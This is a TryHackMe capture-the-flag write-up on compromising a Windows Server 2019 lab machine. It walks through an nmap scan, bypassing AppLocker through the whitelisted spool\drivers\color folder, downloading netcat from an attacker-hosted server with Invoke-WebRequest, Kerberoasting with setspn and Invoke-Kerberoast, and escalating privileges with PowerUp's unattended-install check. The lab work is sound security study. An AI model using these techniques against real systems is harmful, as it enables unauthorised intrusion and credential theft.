TryHackMe Corp Writeup – Bypassing Windows Server 2019 Applocker and Kerberoasting
Hello and welcome back my TryHackMe writeup. So, I have a new task assigned for myself today to compromise a Windows machine in the TryHackMe lab. The machine called “Corp” a Windows Server 2019 Datacenter Edition.
Basically the machine is Subscriber only machine. The best part of subscribing THM is in some challenges you will get to have access to the real life virtual machine you can either RDP it or access it through your favorite web browser. However, I always prefer to RDP directly from my Windows laptop on such machine because of the stability.
The Real Task
The task is to bypass the Windows Applocker and escalate privilege. So, by end of the exploit one will learn about basics of kerberoasting, evading antivirus detection, bypassing applocker and escalating privileges on a Windows server.
Let us start.
Lets us make a nmap scan first
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 12:41 +03 NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 12:41 Completed NSE at 12:41, 0.00s elapsed Initiating NSE at 12:41 Completed NSE at 12:41, 0.00s elapsed Initiating NSE at 12:41 Completed NSE at 12:41, 0.00s elapsed Initiating Ping Scan at 12:41 Scanning 18.104.22.168 [4 ports] Completed Ping Scan at 12:41, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 12:41 Completed Parallel DNS resolution of 1 host. at 12:41, 5.52s elapsed Initiating SYN Stealth Scan at 12:41 Scanning ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (22.214.171.124) [1000 ports] Discovered open port 2000/tcp on 126.96.36.199 Discovered open port 139/tcp on 188.8.131.52 Discovered open port 135/tcp on 184.108.40.206 Discovered open port 53/tcp on 220.127.116.11 Discovered open port 3389/tcp on 18.104.22.168 Discovered open port 445/tcp on 22.214.171.124 Discovered open port 636/tcp on 126.96.36.199 Discovered open port 3268/tcp on 188.8.131.52 Discovered open port 593/tcp on 184.108.40.206 Discovered open port 5060/tcp on 220.127.116.11 Discovered open port 3269/tcp on 18.104.22.168 Discovered open port 464/tcp on 22.214.171.124 Discovered open port 389/tcp on 126.96.36.199 Completed SYN Stealth Scan at 12:42, 36.12s elapsed (1000 total ports) Initiating Service scan at 12:42 Scanning 13 services on ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (188.8.131.52) Completed Service scan at 12:44, 161.31s elapsed (13 services on 1 host) Initiating OS detection (try #1) against ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (184.108.40.206) Retrying OS detection (try #2) against ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (220.127.116.11) Initiating Traceroute at 12:44 Completed Traceroute at 12:44, 0.02s elapsed Initiating Parallel DNS resolution of 2 hosts. at 12:44 Completed Parallel DNS resolution of 2 hosts. at 12:44, 0.13s elapsed NSE: Script scanning 18.104.22.168. Initiating NSE at 12:44 Completed NSE at 12:45, 44.70s elapsed Initiating NSE at 12:45 Completed NSE at 12:47, 121.02s elapsed Initiating NSE at 12:47 Completed NSE at 12:47, 0.00s elapsed Nmap scan report for ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (22.214.171.124) Host is up (0.024s latency). Not shown: 986 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? 113/tcp closed ident 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 2000/tcp open cisco-sccp? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: CORP | NetBIOS_Domain_Name: CORP | NetBIOS_Computer_Name: OMEGA | DNS_Domain_Name: corp.local | DNS_Computer_Name: omega.corp.local | DNS_Tree_Name: corp.local | Product_Version: 10.0.17763 |_ System_Time: 2020-05-14T09:44:49+00:00 | ssl-cert: Subject: commonName=omega.corp.local | Issuer: commonName=omega.corp.local | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-05-13T08:30:43 | Not valid after: 2020-11-12T08:30:43 | MD5: d5c2 a37d 4171 365c 17af 2d4c a108 3285 |_SHA-1: fa74 2b64 e46e f599 ac78 63da bc40 d054 669c 2b9b |_ssl-date: 2020-05-14T09:45:33+00:00; 0s from scanner time. 5060/tcp open sip? Device type: bridge|general purpose Running (JUST GUESSING): Oracle Virtualbox (97%), QEMU (94%) OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu Aggressive OS guesses: Oracle Virtualbox (97%), QEMU user mode network gateway (94%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TCP Sequence Prediction: Difficulty=20 (Good luck!) IP ID Sequence Generation: Incremental Service Info: Host: OMEGA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-05-14T09:44:51 |_ start_date: N/A TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 1.43 ms 10.0.2.2 2 1.66 ms ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (126.96.36.199) NSE: Script Post-scanning. Initiating NSE at 12:47 Completed NSE at 12:47, 0.00s elapsed Initiating NSE at 12:47 Completed NSE at 12:47, 0.00s elapsed Initiating NSE at 12:47 Completed NSE at 12:47, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 377.06 seconds Raw packets sent: 3044 (136.980KB) | Rcvd: 258 (12.231KB)
Ok, a few good number of ports are open, I will consider the rest ports later and try to RDP the machine first. I used my windows RDP to connect and test and then used XFreeRDP in my Kali for easy access to file share.
[Task 2] Bypassing Applocker
The Applocker is application whitelisting technology introduced since Windows 7. It allows restricting which programs users can execute based on the application’s path, publisher and associated hash.
How To Bypass an Applocker
There are many ways to bypass AppLocker. If the AppLocker is configured using the default AppLocker rules, we can bypass it by placing an executable in the application directory. The C:\Windows\System32\spool\drivers\color – is the one mostly being compromised because this is whitelisted by default.
The other ways are discussed here:
And there is a full repo in GitHub called “Ultimate AppLocker ByPass List” that has a list of different possible ways of bypassing techniques.
But in this challenge I’m going to use the location C:\Windows\System32\spool\drivers\color where I move my netcat.exe and run programs from that location, because anything run from that location being ignored or passed through.
I host a Python SimpleHTTPServer and manually copied the nc.exe to the path, but I’ve been blocked by Internet Explorer security settings.
Using PowerShell to import exe
I used the PowerShell Invoke-WebRequest to import the file from my local Python HTTPServer
Invoke-WebRequest http://10.11.xxx.xxx:8888/nc.exe -OutFile C:\Users\dark\Desktop\nc.exe
So to make sure my netcat is running, I simply run it and called the help and it is confirmed working.
The Task 2-1 is done.
Task 2-2 – Obtaining The Flag from the ConsoleHost_history
As other OS consoles, PowerShell as well stores the history of Console in the file called ConsoleHost_history.txt in %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt location. I need to obtain the first flag from that location.
And here is the flag:
[Task 3] Kerberoasting
The task 3 is being Kerberoasting. I’m supposed to do use a PowerShell script to request a service ticket for an account and acquire the ticket hash. Then, I will need to crack the hash and get access to another user account!
First, I will need to extract and find all accounts in the Service Principal Name (SPN), for this I will use the PowerShell command:
setspn -T medin -Q */*
The script will run for a couple of seconds and returns with the SPN accounts in the server.
PS C:\Windows\System32\spool\drivers\color> setspn -T medin -Q */* Ldap Error(0x51 -- Server Down): ldap_connect Failed to retrieve DN for domain "medin" : 0x00000051 Warning: No valid targets specified, reverting to current domain. CN=OMEGA,OU=Domain Controllers,DC=corp,DC=local Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/omega.corp.local ldap/omega.corp.local/ForestDnsZones.corp.local ldap/omega.corp.local/DomainDnsZones.corp.local TERMSRV/OMEGA TERMSRV/omega.corp.local DNS/omega.corp.local GC/omega.corp.local/corp.local RestrictedKrbHost/omega.corp.local RestrictedKrbHost/OMEGA RPC/7c4e4bec-1a37-4379-955f-a0475cd78a5d._msdcs.corp.local HOST/OMEGA/CORP HOST/omega.corp.local/CORP HOST/OMEGA HOST/omega.corp.local HOST/omega.corp.local/corp.local E3514235-4B06-11D1-AB04-00C04FC2DCD2/7c4e4bec-1a37-4379-955f-a0475cd78a5d/corp.local ldap/OMEGA/CORP ldap/7c4e4bec-1a37-4379-955f-a0475cd78a5d._msdcs.corp.local ldap/omega.corp.local/CORP ldap/OMEGA ldap/omega.corp.local ldap/omega.corp.local/corp.local CN=krbtgt,CN=Users,DC=corp,DC=local kadmin/changepw CN=fela,CN=Users,DC=corp,DC=local HTTP/fela HOSTemail@example.com HTTPfirstname.lastname@example.org Existing SPN found! PS C:\Windows\System32\spool\drivers\color>
I found an existing Service Account for the user called “fela”
Getting Hash From Service Principal Name Account
As we all know,
Invoke-Kerberoast.ps1 is one of the commonly used PowerShell script to get HASH from the compromised SPN account. Since the target machine is already connected to the internet I download the script from GitHub CDN.
Once downloaded, I run the command Invoke-Command and output the hash in hashcat format so that its easy fir me to crack it.
Cracking The hash
I used John to crack the hash using a very simple command and rockyou as wordfile.
Once I have the password, I logged-off the RDP from current user Dark and Logged-in as new user Fela. The falg #2 was found in the desktop of the user Fela.
Privilege Escalation To Administrator
Now I have the user Fela compromised I will look for more and see if I can potentially escalate my privilege as Administrator. For this, I’m going to use PowerShellMafia’s PowerSploit. PowerUp normally look for common Windows privilege escalation vectors that rely on misconfigurations. You will find more usage examples and guide on author’s blog.
Firs, I need to import the PowerShell script directly in to the server from GitHub repo and run Invoke-AllChecks to see if I could find any vulnarabilities.
The script found a couple of vulns, let us run Unattended Path exploit. Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode, where the Administrator password is stored in Base64 encoded format.
Logging As Administrator
I had an issue accessing the Administrator, I wasn’t able to login using XFreeRDP, it was giving LoginFailure error. I tried a couple of times and tried to log in from my Windows RDP, noticed that the password was expired. Windows was prompting me to change the password, but some reason, I couldn’t change it.
Whatever the error, I should get the FLAG, so I re logged-in back thinking to try the DLL exploit found in the PowerSploit enum. But I found a shortcut to read flag from the Administrator’s desktop from the user Fela. C:/Users/Administrator/Desktop/flag.txt. I don’t know if it was allowed intentionally or wrong access rights.
[UPDATE] – I managed to talk to Paradox over Discord and it was an unintended way I owned the last flag, a small issue and has been fixed already I believe.
Thank you for reading.